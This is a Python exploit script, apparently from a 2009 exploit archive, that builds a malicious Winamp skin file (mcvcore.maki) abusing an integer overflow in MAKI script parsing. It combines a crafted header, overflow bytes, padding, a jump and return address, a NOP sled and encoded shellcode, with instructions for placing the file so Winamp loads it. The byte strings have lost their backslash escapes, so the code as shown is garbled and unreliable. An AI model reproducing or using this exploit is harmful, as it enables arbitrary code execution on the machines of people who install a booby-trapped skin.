# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "WinampSkinsBentoscripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
#      just edit the calculations of the chars
#

header = (
"x46x47x03x04x17x00x00x00x2Ax00x00x00"
"x71x49x65x51x87x0Dx51x4Ax91xE3xA6xB5"
"x32x35xF3xE7x64x0FxF5xD6xFAx93xB7x49"
"x93xF1xBAx66xEFxAEx3Ex98x7BxC4x0DxE9"
"x0Dx84xE7x4AxB0x2Cx04x0BxD2x75xF7xFC"
"xB5x3Ax02xB2x4Dx43xA1x4BxBExAEx59x63"
"x75x03xF3xC6x78x57xC6x87x43xE7xFEx49"
"x85xF9x09xCCx53x2AxFDx56x65x36x60x38"
"x1Bx46xA7x42xAAx75xD8x3Fx66x67xBFx73"
"xF4x7Ax78xF4xBBxB2xF7x4Ex9CxFBxE7x4B"
"xA9xBExA8x8Dx02x0Cx37x3AxBFx3Cx9Fx43"
"x84xF1x86x88x5BxCFx1Ex36xB6x5Bx0Cx5D"
"xE1x7Dx1Fx4BxA7x0Fx8Dx16x59x94x19x41"
"x99xE1xE3x4Ex36xC6xECx4Bx97xCDx78xBC"
"x9Cx86x28xB0xE5x95xBEx45x72x20x91x41"
"x93x5CxBBx5FxF9xF1x17xFDx4Ex6Dx90x60"
"x7Ex53x2Ex48xB0x04xCCx94x61x88x56x72"
"xC0xBCx3Ax40x22x6FxD6x4Bx8BxA4x10xC8"
"x29x93x25x47x4Dx3ExAAx97xD0xF4xA8x4F"
"x81x7Bx0Dx0AxF2x2Ax45x49x83xFAxBBxE4"
"x64xF4x81xD9x49xB0xC0xA8x5Bx2ExC3xBC"
"xFDx3Fx5ExB6x62x5Ex37x8Dx40x8DxEAx76"
"x81x4AxB9x1Bx77xBEx97x4FxCExB0x77x19"
"x4Ex99x56xD4x98x33xC9x6Cx27x0Dx20xC2"
"xA8xEBx51x2Ax4BxBAx7Fx5Dx4BxC6x5Dx4C"
"x71x38xBAx1Ex8Dx9Ex48x3Ex48xB9x60x8D"
"x1Fx43xC5xC4x05x40xC9x08x0Fx39xAFx23"
"x4Bx80xF3xB8xC4x8Fx7ExBBx59x72x86xAA"
"xEFx0Ex31xFAx41xB7xDCx85xA9x52x5BxCB"
"x4Bx44x32xFDx7Dx51x37x7Cx4ExBFx40x82"
"xAEx5Fx3AxDCx33x15xFAxB9x5Ax7Dx9Ax57"
"x45xABxC8x65x57xA6xC6x7CxA9xCDxDDx8E"
"x69x1Ex8FxECx4Fx9Bx12xF9x44xF9x09xFF"
"x45x27xCDx64x6Bx26x5Ax4Bx4Cx8Cx59xE6"
"xA7x0CxF6x49x3AxE4x05xCBx6DxC4x8AxC2"
"x48xB1x93x49xF0x91x0ExF5x4AxFFxCFxDC"
"xB4xFEx81xCCx4Bx96x1Bx72x0FxD5xBEx0F"
"xFFxE1x8CxE2x01x59xB0xD5x11x97x9FxE4"
"xDEx6Fx51x76x0Dx0AxBDxF8xF0x80xA5x1B"
"xA6x42xA0x93x32x36xA0x0Cx8Dx4Ax1Bx34"
"x2Ex9Bx98x6CxFAx40x8Bx85x0Cx1Bx6ExE8"
"x94x05x71x9BxD5x36xFDx03xF8x4Ax97x95"
"x05x02xB7xDBx26x7Ax10xF2xD5x7FxC4xAC"
"xDFx48xA6xA0x54x51x57x6CxDCx76x35xA5"
"xBAxB5xB3x05xCBx4DxADxC1xE6x18xD2x8F"
"x68x96xC1xFEx29x61xB7xDAx51x4Dx91x65"
"x01xCAx0Cx1Bx70xDBxF7x14x95xD5x36xED"
"xE8x45x98x0Fx3Fx4ExA0x52x2CxD9x82x4B"
"x3Bx9Bx7Ax66x0Ex42x8FxFCx79x41x15x80"
"x9Cx02x99x31xEDxC7x19x53x98x47x98x63"
"x60xB1x5Ax29x8CxAAx4DxC1xBBxE2xF6x84"
"x73x41xBDxB3xB2xEBx2Fx66x55x50x94x05"
"xC0x73x1Fx96x1Bx40x9Bx1Bx67x24x27xAC"
"x41x65x22xBAx3Dx59x77xD0x76x49xB9x52"
"xF4x71x36x55x40x0Bx82x02x03xD4xABx3A"
"x87x4Dx87x8Dx12x32x6FxADxFCxD5x83xC2"
"xDEx24x6ExB7x36x4Ax8CxCCx9Ex24xC4x6B"
"x6Cx73x37x00")

ex = (
"xFFxFFxFFxFFxFFxFFxFFxFF"
"xFFxFFxFF")

shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x48x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax41"
"x58x30x41x31x50x41x42x6bx41x41x51x41x32x41x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x69x79x4bx4cx4d"
"x38x70x44x55x50x45x50x75x50x6ex6bx77x35x67x4cx6c"
"x4bx43x4cx45x55x74x38x55x51x58x6fx4ex6bx52x6fx45"
"x48x4ex6bx43x6fx65x70x76x61x58x6bx50x49x4ex6bx36"
"x54x4ex6bx75x51x4ax4ex56x51x6bx70x4cx59x6cx6cx6e"
"x64x59x50x70x74x63x37x69x51x78x4ax56x6dx45x51x5a"
"x62x78x6bx6cx34x67x4bx51x44x36x44x74x44x30x75x4d"
"x35x6cx4bx31x4fx31x34x65x51x5ax4bx52x46x4cx4bx74"
"x4cx62x6bx6cx4bx61x4fx77x6cx35x51x7ax4bx6cx4bx57"
"x6cx4cx4bx37x71x5ax4bx4cx49x73x6cx77x54x47x74x38"
"x43x50x31x6bx70x32x44x4ex6bx61x50x66x50x4fx75x6b"
"x70x51x68x44x4cx6cx4bx77x30x36x6cx6ex6bx70x70x77"
"x6cx6cx6dx6cx4bx50x68x73x38x6ax4bx74x49x6cx4bx4b"
"x30x4cx70x63x30x73x30x45x50x4ex6bx45x38x35x6cx53"
"x6fx35x61x4cx36x75x30x71x46x6dx59x4ax58x4bx33x4f"
"x30x31x6bx70x50x43x58x61x6ex6ex38x4bx52x32x53x31"
"x78x4cx58x4bx4ex4cx4ax46x6ex50x57x6bx4fx5ax47x50"
"x63x31x71x30x6cx35x33x44x6ex63x55x44x38x35x35x37"
"x70x41")


chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"xebx12x41x41"+"x11x10xf0x14"+"x90"*20+shellcode+chars2)
file.close()

# www.Syue.com [2009-05-22]